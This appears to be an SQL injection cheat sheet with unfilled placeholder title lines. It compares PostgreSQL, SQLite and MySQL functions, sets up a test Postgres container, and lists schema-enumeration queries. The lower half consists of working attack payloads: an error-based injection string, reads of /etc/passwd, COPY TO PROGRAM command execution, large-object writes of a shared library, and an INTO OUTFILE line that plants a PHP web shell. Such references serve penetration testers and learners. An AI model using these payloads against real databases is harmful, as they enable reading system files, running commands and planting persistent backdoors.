Title here
Summary here
SQL injection allows attackers to execute malicious SQL queries through user input areas, potentially accessing, modifying, or deleting data.
DBMS | Query | Output (example) |
---|---|---|
SQLite | SELECT sqlite_version() | 3.42.0 |
MySQL | SELECT VERSION() | 5.7.38 |
PostgreSQL | SELECT version() | PostgreSQL 14.8 … |
PostgreSQL | SQLite | MySQL |
---|---|---|
'a'||'b' | 'a'||'b' | 'a' 'b' |
POW(3,2) | POW(3,2) | POW(3,2) |
CHR(65) | CHAR(65) | CHAR(65) |
ASCII('A') | UNICODE('A') | ASCII('A') |
SUBSTR('abc',2,1) | SUBSTR('abc',2,1) | SUBSTR('abc',2,1) |
PG_SLEEP(4) | Unknown | SLEEP(4) |
SIMILAR TO , ~ | REGEXP , GLOB | REGEXP |
sqlite3
- Docs$ sudo docker run -d --rm --name test-postgres -e POSTGRES_PASSWORD=s3cr3t -e PGDATA=/var/lib/postgresql/data/pgdata postgres:16.3-bookworm
$ sudo docker exec -it test-postgres bash
root@1d5aa23dac7c:/# psql -U postgres
psql (16.3 (Debian 16.3-1.pgdg120+1))
Type "help" for help.
postgres=#
SELECT GROUP_CONCAT(schema_name,',') FROM information_schema.schemata;
SELECT GROUP_CONCAT(table_name,',') FROM information_schema.tables;
SELECT GROUP_CONCAT(column_name,',') FROM information_schema.columns WHERE table_name = 'users';
SELECT datname FROM pg_database;
SELECT string_agg(table_name,',') FROM information_schema.tables;
SELECT string_agg(column_name,',') FROM information_schema.columns WHERE table_name = 'users';
SELECT GROUP_CONCAT(tbl_name,',') FROM sqlite_master WHERE type='table' AND tbl_name NOT like 'sqlite_%';
SELECT sql FROM sqlite_master WHERE tbl_name='users';
SELECT GROUP_CONCAT(name,',') FROM PRAGMA_TABLE_INFO('users');
' AND 1=CAST((SELECT username FROM users) AS int)--
SELECT pg_ls_dir('.');
SELECT pg_read_file('/etc/passwd');
COPY (SELECT '') TO PROGRAM 'sleep 5';
SELECT lo_import('/etc/passwd', 31337);
SELECT lo_get(31337);
SELECT lo_from_bytea(131337, decode('SGVsbG8gV29ybGQh', 'base64'));
SELECT lo_export(131337, '/tmp/exploit.so');
SELECT LOAD_FILE('/etc/passwd');
SELECT '<?php system($_REQUEST[c]); ?>' INTO OUTFILE '/var/www/html/shell.php';